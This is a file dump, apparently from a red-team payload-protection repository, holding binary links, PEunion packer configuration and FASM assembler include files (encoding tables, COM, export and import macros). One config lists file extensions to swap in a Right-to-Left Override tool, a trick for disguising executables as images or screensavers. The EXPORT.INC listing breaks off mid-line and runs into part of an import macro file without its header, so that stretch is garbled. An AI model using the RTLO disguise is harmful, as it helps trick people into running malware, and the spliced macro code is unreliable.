/contrib/Nimcrypt2/nimcrypt.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/Nimcrypt2/nimcrypt.exe
--------------------------------------------------------------------------------
/contrib/PEunion/Config/recent.ini:
--------------------------------------------------------------------------------
1 | [projects]
2 | 1 = D:\dev2\ProtectMyTooling\contrib\_project-files\PEunion\dotnet86.peu
3 | 2 = D:\dev2\ProtectMyTooling\contrib\_project-files\PEunion\native32.peu
4 |
--------------------------------------------------------------------------------
/contrib/PEunion/Config/rtlo_extension_alternatives.ini:
--------------------------------------------------------------------------------
1 | ; List of extensions that are known for interchangeability
2 | ; Used in Right-to-Left Override tool
3 |
4 | [alternative]
5 | extension = exe
6 | extension = scr
7 |
8 | [alternative]
9 | extension = jpg
10 | extension = jpeg
11 |
12 | [alternative]
13 | extension = mid
14 | extension = midi
--------------------------------------------------------------------------------
/contrib/PEunion/Config/viewstate.ini:
--------------------------------------------------------------------------------
1 | [window]
2 | x = 560
3 | y = 160
4 | width = 1440
5 | height = 1080
6 | maximized = false
7 | splitter2 = 260
8 |
9 | [text_dialog]
10 |
11 | [help_dialog]
12 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/FASM.EXE:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/PEunion/FASM/FASM.EXE
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/API/COMDLG32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; COMDLG32 API calls
3 | ; import list for the comdlg32 library: each entry is a symbol followed by the quoted name to import
4 | import comdlg32,\
5 | ChooseColorA,'ChooseColorA',\
6 | ChooseColorW,'ChooseColorW',\
7 | ChooseFontA,'ChooseFontA',\
8 | ChooseFontW,'ChooseFontW',\
9 | CommDlgExtendedError,'CommDlgExtendedError',\
10 | FindTextA,'FindTextA',\
11 | FindTextW,'FindTextW',\
12 | FormatCharDlgProc,'FormatCharDlgProc',\
13 | GetFileTitleA,'GetFileTitleA',\
14 | GetFileTitleW,'GetFileTitleW',\
15 | GetOpenFileNameA,'GetOpenFileNameA',\
16 | GetOpenFileNameW,'GetOpenFileNameW',\
17 | GetSaveFileNameA,'GetSaveFileNameA',\
18 | GetSaveFileNameW,'GetSaveFileNameW',\
19 | LoadAlterBitmap,'LoadAlterBitmap',\
20 | PageSetupDlgA,'PageSetupDlgA',\
21 | PageSetupDlgW,'PageSetupDlgW',\
22 | PrintDlgA,'PrintDlgA',\
23 | PrintDlgW,'PrintDlgW',\
24 | ReplaceTextA,'ReplaceTextA',\
25 | ReplaceTextW,'ReplaceTextW',\
26 | WantArrows,'WantArrows',\
27 | dwLBSubclass,'dwLBSubclass',\
28 | dwOKSubclass,'dwOKSubclass'
29 | ; names below carry no A/W suffix; presumably the api macro maps each to one of the variants above - confirm against its definition
30 | api ChooseColor,\
31 | ChooseFont,\
32 | FindText,\
33 | GetFileTitle,\
34 | GetOpenFileName,\
35 | GetSaveFileName,\
36 | PageSetupDlg,\
37 | PrintDlg,\
38 | ReplaceText
39 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1250.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1250
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,160h,2039h,15Ah,164h,17Dh,179h
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,161h,203Ah,15Bh,165h,17Eh,17Ah
12 | dw 0A0h,2C7h,2D8h,141h,0A4h,104h,0A6h,0A7h,0A8h,0A9h,15Eh,0ABh,0ACh,0ADh,0AEh,17Bh
13 | dw 0B0h,0B1h,2DBh,142h,0B4h,0B5h,0B6h,0B7h,0B8h,105h,15Fh,0BBh,13Dh,2DDh,13Eh,17Ch
14 | dw 154h,0C1h,0C2h,102h,0C4h,139h,106h,0C7h,10Ch,0C9h,118h,0CBh,11Ah,0CDh,0CEh,10Eh
15 | dw 110h,143h,147h,0D3h,0D4h,150h,0D6h,0D7h,158h,16Eh,0DAh,170h,0DCh,0DDh,162h,0DFh
16 | dw 155h,0E1h,0E2h,103h,0E4h,13Ah,107h,0E7h,10Dh,0E9h,119h,0EBh,11Bh,0EDh,0EEh,10Fh
17 | dw 111h,144h,148h,0F3h,0F4h,151h,0F6h,0F7h,159h,16Fh,0FAh,171h,0FCh,0FDh,163h,2D9h
18 | end virtual
19 | ; NOTE(review): table slots written as ? have no mapping; what load returns for them is not shown here (presumably 0, which would put a NUL inside the string) - confirm
20 | macro du [arg] ; wraps the built-in du and re-maps code-page bytes above 7Fh through the __encoding table
21 | { local offset,char
22 | offset = $-$$ ; position in the current section before the data is emitted
23 | du arg ; emit the data first, then patch it in place below
24 | if arg eqtype '' ; only quoted strings are post-processed
25 | repeat ($-offset-$$)/2 ; one pass per 16-bit unit just emitted
26 | load char byte from $$+offset+(%-1)*2 ; low byte of the unit (assumes the high byte is 0 at this point - TODO confirm)
27 | if char > 7Fh ; 00h-7Fh are left unchanged
28 | load char word from __encoding:char*2 ; table lookup, indexed by the byte value
29 | store word char at $$+offset+(%-1)*2 ; overwrite the unit with the looked-up value
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1251.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1251
3 |
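4 | rept 1 { local ..encoding ; fresh local name, so this table gets its own label
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0 ; assembly-time lookup table: the word at offset byte*2 is the UTF-16 value for that Windows-1251 byte
8 | __encoding::
9 | times 80h dw %-1 ; 00h-7Fh map to themselves
10 | dw 402h,403h,201Ah,453h,201Eh,2026h,2020h,2021h,20ACh,2030h,409h,2039h,40Ah,40Ch,40Bh,40Fh ; 80h-8Fh; 80h is U+0402 (was 401h, which is the value of A8h)
11 | dw 452h,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,459h,203Ah,45Ah,45Ch,45Bh,45Fh ; 90h-9Fh; ? marks a byte with no mapping
12 | dw 0A0h,40Eh,45Eh,408h,0A4h,490h,0A6h,0A7h,401h,0A9h,404h,0ABh,0ACh,0ADh,0AEh,407h ; A0h-AFh
13 | dw 0B0h,0B1h,406h,456h,491h,0B5h,0B6h,0B7h,451h,2116h,454h,0BBh,458h,405h,455h,457h ; B0h-BFh
14 | times 40h dw 410h+%-1 ; C0h-FFh map to U+0410-U+044F
15 | end virtual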
16 |
17 | macro du [arg]
18 | { local offset,char
19 | offset = $-$$
20 | du arg
21 | if arg eqtype ''
22 | repeat ($-offset-$$)/2
23 | load char byte from $$+offset+(%-1)*2
24 | if char > 7Fh
25 | load char word from __encoding:char*2
26 | store word char at $$+offset+(%-1)*2
27 | end if
28 | end repeat
29 | end if }
30 |
31 | struc du [args]
32 | { common label . word
33 | du args }
34 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1252.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1252
3 |
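4 | rept 1 { local ..encoding ; fresh local name, so this table gets its own label
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0 ; assembly-time lookup table: the word at offset byte*2 is the UTF-16 value for that Windows-1252 byte
8 | __encoding::
9 | times 80h dw %-1 ; 00h-7Fh map to themselves
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,17Dh,? ; 80h-8Fh; 8Eh is U+017D (was written 17D, without the hex suffix)
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,17Eh,178h ; 90h-9Fh; ? marks a byte with no mapping
12 | times 60h dw 0A0h+%-1 ; A0h-FFh map to themselves
13 | end virtual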
14 |
15 | macro du [arg]
16 | { local offset,char
17 | offset = $-$$
18 | du arg
19 | if arg eqtype ''
20 | repeat ($-offset-$$)/2
21 | load char byte from $$+offset+(%-1)*2
22 | if char > 7Fh
23 | load char word from __encoding:char*2
24 | store word char at $$+offset+(%-1)*2
25 | end if
26 | end repeat
27 | end if }
28 |
29 | struc du [args]
30 | { common label . word
31 | du args }
32 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1253.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1253
3 |
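4 | rept 1 { local ..encoding ; fresh local name, so this table gets its own label
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0 ; assembly-time lookup table: the word at offset byte*2 is the UTF-16 value for that Windows-1253 byte
8 | __encoding::
9 | times 80h dw %-1 ; 00h-7Fh map to themselves
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,?,?,? ; 80h-8Fh; ? marks a byte with no mapping
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,?,?,? ; 90h-9Fh
12 | dw 0A0h,385h,386h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,?,0ABh,0ACh,0ADh,0AEh,2015h ; A0h-AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,384h,0B5h,0B6h,0B7h,388h,389h,38Ah,0BBh,38Ch,0BDh,38Eh,38Fh ; B0h-BFh; B8h is U+0388 (was 288h), in sequence with 389h and 38Ah
14 | times 40h dw 390h+%-1 ; C0h-FFh map to U+0390-U+03CF
15 | end virtual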
16 |
17 | macro du [arg]
18 | { local offset,char
19 | offset = $-$$
20 | du arg
21 | if arg eqtype ''
22 | repeat ($-offset-$$)/2
23 | load char byte from $$+offset+(%-1)*2
24 | if char > 7Fh
25 | load char word from __encoding:char*2
26 | store word char at $$+offset+(%-1)*2
27 | end if
28 | end repeat
29 | end if }
30 |
31 | struc du [args]
32 | { common label . word
33 | du args }
34 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1254.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1254
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,?,178h
12 | times 30h dw 0A0h+%-1
13 | dw 11Eh,0D1h,0D2h,0D3h,0D4h,0D5h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,130h,15Eh,0DFh
14 | times 10h dw 0E0h+%-1
15 | dw 11Fh,0F1h,0F2h,0F3h,0F4h,0F5h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,131h,15Fh,0FFh
16 | end virtual
17 |
18 | macro du [arg]
19 | { local offset,char
20 | offset = $-$$
21 | du arg
22 | if arg eqtype ''
23 | repeat ($-offset-$$)/2
24 | load char byte from $$+offset+(%-1)*2
25 | if char > 7Fh
26 | load char word from __encoding:char*2
27 | store word char at $$+offset+(%-1)*2
28 | end if
29 | end repeat
30 | end if }
31 |
32 | struc du [args]
33 | { common label . word
34 | du args }
35 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1255.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1255
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,?,?,?,?
12 | dw 0A0h,0A1h,0A2h,0A3h,20AAh,0A5h,0A6h,0A7h,0A8h,0A9h,0D7h,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0F7h,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 5B0h,5B1h,5B2h,5B3h,5B4h,5B5h,5B6h,5B7h,5B8h,5B9h,?,5BBh,5BCh,5BDh,5BEh,5BFh
15 | dw 5C0h,5C1h,5C2h,5C3h,5F0h,5F1h,5F2h,5F3h,5F4h,?,?,?,?,?,?,?
16 | dw 5D0h,5D1h,5D2h,5D3h,5D4h,5D5h,5D6h,5D7h,5D8h,5D9h,5DAh,5DBh,5DCh,5DDh,5DEh,5DFh
17 | dw 5E0h,5E1h,5E2h,5E3h,5E4h,5E5h,5E6h,5E7h,5E8h,5E9h,5EAh,?,?,200Eh,200Fh,?
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1256.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1256
3 |
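4 | rept 1 { local ..encoding ; fresh local name, so this table gets its own label
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0 ; assembly-time lookup table: the word at offset byte*2 is the UTF-16 value for that Windows-1256 byte
8 | __encoding::
9 | times 80h dw %-1 ; 00h-7Fh map to themselves
10 | dw 20ACh,67Eh,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,679h,2039h,152h,686h,698h,688h ; 80h-8Fh
11 | dw 6AFh,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,6A9h,2122h,691h,203Ah,153h,200Ch,200Dh,6BAh ; 90h-9Fh
12 | dw 0A0h,60Ch,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,6BEh,0ABh,0ACh,0ADh,0AEh,0AFh ; A0h-AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,61Bh,0BBh,0BCh,0BDh,0BEh,61Fh ; B0h-BFh; BAh is U+061B and BFh is U+061F (were 0BAh and 0BFh)
14 | dw 6C1h,621h,622h,623h,624h,625h,626h,627h,628h,629h,62Ah,62Bh,62Ch,62Dh,62Eh,62Fh ; C0h-CFh
15 | dw 630h,631h,632h,633h,634h,635h,636h,0D7h,637h,638h,639h,63Ah,640h,641h,642h,643h ; D0h-DFh
16 | dw 0E0h,644h,0E2h,645h,646h,647h,648h,0E7h,0E8h,0E9h,0EAh,0EBh,649h,64Ah,0EEh,0EFh ; E0h-EFh
17 | dw 64Bh,64Ch,64Dh,64Eh,0F4h,64Fh,650h,0F7h,651h,0F9h,652h,0FBh,0FCh,200Eh,200Fh,6D2h ; F0h-FFh
18 | end virtual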
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1257.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1257
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,0A8h,2C7h,0B8h
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,0AFh,2DBh,?
12 | dw 0A0h,?,0A2h,0A3h,0A4h,?,0A6h,0A7h,0D8h,0A9h,156h,0ABh,0ACh,0ADh,0AEh,0C6h
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0F8h,0B9h,157h,0BBh,0BCh,0BDh,0BEh,0E6h
14 | dw 104h,12Eh,100h,106h,0C4h,0C5h,118h,112h,10Ch,0C9h,179h,116h,122h,136h,12Ah,13Bh
15 | dw 160h,143h,145h,0D3h,14Ch,0D5h,0D6h,0D7h,172h,141h,15Ah,16Ah,0DCh,17Bh,17Dh,0DFh
16 | dw 105h,12Fh,101h,107h,0E4h,0E5h,119h,113h,10Dh,0E9h,17Ah,117h,123h,137h,12Bh,13Ch
17 | dw 161h,144h,146h,0F3h,14Dh,0F5h,0F6h,0F7h,173h,142h,15Bh,16Bh,0FCh,17Ch,17Eh,2D9h
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN1258.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 1258
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,152h,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,153h,?,?,178h
12 | dw 0A0h,0A1h,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,0AAh,0ABh,0ACh,0ADh,0AEh,0AFh
13 | dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
14 | dw 0C0h,0C1h,0C2h,102h,0C4h,0C5h,0C6h,0C7h,0C8h,0C9h,0CAh,0CBh,300h,0CDh,0CEh,0CFh
15 | dw 110h,0D1h,309h,0D3h,0D4h,1A0h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,1AFh,303h,0DFh
16 | dw 0E0h,0E1h,0E2h,103h,0E4h,0E5h,0E6h,0E7h,0E8h,0E9h,0EAh,0EBh,301h,0EDh,0EEh,0EFh
17 | dw 111h,0F1h,323h,0F3h,0F4h,1A1h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,1B0h,20ABh,0FFh
18 | end virtual
19 |
20 | macro du [arg]
21 | { local offset,char
22 | offset = $-$$
23 | du arg
24 | if arg eqtype ''
25 | repeat ($-offset-$$)/2
26 | load char byte from $$+offset+(%-1)*2
27 | if char > 7Fh
28 | load char word from __encoding:char*2
29 | store word char at $$+offset+(%-1)*2
30 | end if
31 | end repeat
32 | end if }
33 |
34 | struc du [args]
35 | { common label . word
36 | du args }
37 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/ENCODING/WIN874.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Windows 874
3 |
4 | rept 1 { local ..encoding
5 | __encoding equ ..encoding }
6 |
7 | virtual at 0
8 | __encoding::
9 | times 80h dw %-1
10 | dw 20ACh,?,?,?,?,2026h,?,?,?,?,?,?,?,?,?,?
11 | dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,?,?,?,?,?,?,?
12 | times 60h dw 0E00h+%-1
13 | end virtual
14 |
15 | macro du [arg]
16 | { local offset,char
17 | offset = $-$$
18 | du arg
19 | if arg eqtype ''
20 | repeat ($-offset-$$)/2
21 | load char byte from $$+offset+(%-1)*2
22 | if char > 7Fh
23 | load char word from __encoding:char*2
24 | store word char at $$+offset+(%-1)*2
25 | end if
26 | end repeat
27 | end if }
28 |
29 | struc du [args]
30 | { common label . word
31 | du args }
32 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/COM32.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for interfacing the COM (Component Object Model) classes
3 |
4 | macro cominvk object,proc,[arg] ; call method `proc` on the COM object held in the variable `object`
5 | { common
6 | if ~ arg eq ; only when arguments were given
7 | reverse
8 | pushd arg ; pushed last-to-first, so the first argument ends up nearest the top of the stack
9 | common
10 | end if
11 | assert defined object#.com.object ; must be a COM object
12 | mov eax,[object] ; object pointer stored in the variable
13 | push eax ; pushed after all arguments, so it is the first value the callee sees
14 | mov eax,[eax] ; first dword of the object: pointer to its method table
15 | call [eax+object#.#proc] } ; indirect call through the table slot at offset object.proc; NOTE(review): nothing here checks [object] for zero at run time, and eax is overwritten
16 |
17 | macro comcall handle,interface,proc,[arg] ; call method `proc` of `interface` on the object pointer `handle`
18 | { common
19 | if ~ arg eq ; only when arguments were given
20 | reverse
21 | pushd arg ; pushed last-to-first
22 | common
23 | end if
24 | assert defined interface#.com.interface ; must be a COM interface
25 | if handle eqtype eax | handle eqtype 0 ; handle given as a register or as a numeric expression
26 | push handle ; object pointer is the last value pushed
27 | local ..handle
28 | label ..handle at handle ; lets the pointer value be used as a memory address
29 | mov eax,[..handle] ; dword at the object address: pointer to the method table
30 | else ; any other operand form
31 | mov eax,handle
32 | push eax ; object pointer is the last value pushed
33 | mov eax,[eax] ; pointer to the method table
34 | end if
35 | call [eax+interface#.#proc] } ; indirect call through the table slot at offset interface.proc; NOTE(review): the pointer is not checked for zero at run time, and eax is overwritten
36 |
37 | macro interface name,[proc]
38 | { common
39 | struc name \{
40 | match , @struct \\{ define field@struct .,name, \\}
41 | match no, @struct \\{ . dd ?
42 | virtual at 0
43 | forward
44 | .#proc dd ?
45 | common
46 | .\#\\.com.object = name#.com.interface
47 | end virtual \\} \}
48 | virtual at 0
49 | forward
50 | name#.#proc dd ?
51 | common
52 | name#.com.interface = $ shr 2
53 | end virtual }
54 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/COM64.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for interfacing the COM (Component Object Model) classes
3 |
4 | macro cominvk object,proc,[arg] ; 64-bit: call method `proc` on the COM object held in the variable `object`
5 | { common
6 | assert defined object#.com.object ; must be a COM object
7 | macro call dummy ; temporarily replaces `call`; its operand is ignored
8 | \{ mov rax,[rcx] ; qword at the address in rcx: pointer to the method table (rcx is presumably loaded with [object] by fastcall - confirm in proc64.inc)
9 | call [rax+object#.#proc] \} ; indirect call through the table slot at offset object.proc
10 | fastcall ,[object],arg ; empty call target; [object] is passed ahead of the caller's arguments
11 | purge call } ; drop the temporary `call` macro; NOTE(review): no run-time check of the object pointer is made here
12 |
13 | macro comcall handle,interface,proc,[arg] ; 64-bit: call method `proc` of `interface` on the object pointer `handle`
14 | { common
15 | assert defined interface#.com.interface ; must be a COM interface
16 | macro call dummy ; temporarily replaces `call`; its operand is ignored
17 | \{ mov rax,[rcx] ; qword at the address in rcx: pointer to the method table (rcx is presumably loaded with `handle` by fastcall - confirm in proc64.inc)
18 | call [rax+interface#.#proc] \} ; indirect call through the table slot at offset interface.proc
19 | fastcall ,handle,arg ; empty call target; handle is passed ahead of the caller's arguments
20 | purge call } ; drop the temporary `call` macro; NOTE(review): no run-time check of the handle is made here
21 |
22 | macro interface name,[proc]
23 | { common
24 | struc name \{
25 | match , @struct \\{ define field@struct .,name, \\}
26 | match no, @struct \\{ . dq ?
27 | virtual at 0
28 | forward
29 | .#proc dq ?
30 | common
31 | .\#\\.com.object = name#.com.interface
32 | end virtual \\} \}
33 | virtual at 0
34 | forward
35 | name#.#proc dq ?
36 | common
37 | name#.com.interface = $ shr 3
38 | end virtual }
39 |
40 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/EXPORT.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstruction for making export section
3 |
4 | macro export dllname,[label,string]
5 | { common
6 | local module,addresses,names,ordinal,count
7 | count = 0
8 | forward
9 | count = count+1
10 | common
11 | dd 0,0,0,RVA module,1
12 | dd count,count,RVA addresses,RVA names,RVA ordinal
13 | addresses:
14 | forward
15 | dd RVA label
16 | common
17 | names:
18 | forward
19 | local name
20 | dd RVA name
21 | common
22 | ordinal: count = 0
23 | forward
24 | dw count
25 | count = count+1
26 | common
27 | module db dllname,0
28 | forward
29 | name db string,0
30 | common
31 | local x,y,z,str1,str2,v1,v2
32 | x = count shr 1
33 | while x > 0
34 | y = x
35 | while y < count
36 | z = y
37 | while z-x >= 0
38 | load v1 dword from names+z*4
39 | str1=($-RVA $)+v1
40 | load v2 dword from names+(z-x)*4
41 | str2=($-RVA $)+v2
42 | while v1 > 0
43 | load v1 from str1+%-1
44 | load v2 from str2+%-1
45 | if v1 <> v2
46 | break
47 | end if
48 | end while
49 | if v1 name#.lookup
41 | name#.redundant = 0
42 | dd 0
43 | else
44 | name#.redundant = 1
45 | end if
46 | name#.address:
47 | forward
48 | if used label
49 | if string eqtype ''
50 | label dd RVA _label
51 | else
52 | label dd 80000000h + string
53 | end if
54 | end if
55 | common
56 | if ~ name#.redundant
57 | dd 0
58 | end if
59 | forward
60 | if used label & string eqtype ''
61 | _label dw 0
62 | db string,0
63 | rb RVA $ and 1
64 | end if
65 | common
66 | end if }
67 |
68 | macro api [name] {}
69 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/IMPORT64.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Macroinstructions for making import section (64-bit)
3 |
4 | macro library [name,string] ; emit the import directory: one 5-dword descriptor per listed library that has used imports
5 | { common
6 | import.data:
7 | forward
8 | local _label
9 | if defined name#.redundant ; set by the `import` macro for this library
10 | if ~ name#.redundant ; skip libraries from which nothing is used
11 | dd RVA name#.lookup,0,0,RVA _label,RVA name#.address ; lookup table, two zero fields, DLL name string, address table
12 | end if
13 | end if
14 | name#.referred = 1 ; tells `import` that this library is listed
15 | common
16 | dd 0,0,0,0,0 ; all-zero descriptor closes the directory
17 | forward
18 | if defined name#.redundant
19 | if ~ name#.redundant
20 | _label db string,0 ; zero-terminated DLL name
21 | rb RVA $ and 1 ; pad to an even address
22 | end if
23 | end if }
24 |
25 | macro import name,[label,string] ; emit the lookup table, address table and name entries for library `name`
26 | { common
27 | rb (- rva $) and 7 ; pad so the tables start on an 8-byte boundary
28 | if defined name#.referred ; set by the `library` macro; otherwise nothing is emitted
29 | name#.lookup:
30 | forward
31 | if used label ; only functions that are referenced get an entry
32 | if string eqtype '' ; quoted string: import by name
33 | local _label
34 | dq RVA _label ; RVA of the name entry emitted further down
35 | else ; not a quoted string: import by ordinal
36 | dq 8000000000000000h + string ; top bit set plus the ordinal number
37 | end if
38 | end if
39 | common
40 | if $ > name#.lookup ; at least one entry was emitted
41 | name#.redundant = 0
42 | dq 0 ; zero entry closes the lookup table
43 | else
44 | name#.redundant = 1 ; nothing used: `library` then omits this library's descriptor
45 | end if
46 | name#.address:
47 | forward
48 | if used label
49 | if string eqtype ''
50 | label dq RVA _label ; `label` names this slot; initial content matches the lookup entry
51 | else
52 | label dq 8000000000000000h + string
53 | end if
54 | end if
55 | common
56 | if ~ name#.redundant
57 | dq 0 ; zero entry closes the address table
58 | end if
59 | forward
60 | if used label & string eqtype ''
61 | _label dw 0 ; 16-bit field ahead of the name, always 0 here
62 | db string,0 ; zero-terminated function name
63 | rb RVA $ and 1 ; pad to an even address
64 | end if
65 | common
66 | end if }
67 |
68 | macro api [name] {}
69 |
--------------------------------------------------------------------------------
/contrib/PEunion/FASM/INCLUDE/MACRO/MASM.INC:
--------------------------------------------------------------------------------
1 |
2 | ; Simulate MASM's syntax
3 |
4 | struc struct
5 | { struct .
6 | name@struct equ . }
7 |
8 | struc ends
9 | { match =.,name@struct \{ ends \} }
10 |
11 | struc proc [params]
12 | { common define@proc .,
13 | name@proc equ . }
14 |
15 | struc endp
16 | { match =.,name@proc \{ endp \} }
17 |
18 | macro option setting
19 | { match =prologue:macro, setting \{ prologue@proc equ macro \}
20 | match =epilogue:macro, setting \{ epilogue@proc equ macro \} }
21 |
22 | macro none procname,flag,parmbytes,localbytes,reglist { }
23 |
24 | macro assume params
25 | {
26 | local expr
27 | define expr params
28 | match reg:struct, expr
29 | \{
30 | match assumed, reg\#@assumed \\{ irp name, assumed \\\{ restore name \\\} \\}
31 | macro label . \\{ local def
32 | define def .
33 | match =reg =at label, def \\\{ define def \\\}
34 | match name at,def \\\{ def@assumed reg,name,label at
35 | define def \\\}
36 | match name,def \\\{ def@assumed reg,.,: \\\} \\}
37 | struc db [val] \\{ \common def@assumed reg,., \\}
38 | struc dw [val] \\{ \common def@assumed reg,., \\}
39 | struc dp [val] \\{ \common def@assumed reg,., \\}
40 | struc dd [val] \\{ \common def@assumed reg,., \\}
41 | struc dt [val] \\{ \common def@assumed reg,., \\}
42 | struc dq [val] \\{ \common def@assumed reg,., \\}
43 | struc rb cnt \\{ def@assumed reg,.,rb cnt \\}
44 | struc rw cnt \\{ def@assumed reg,.,rw cnt \\}
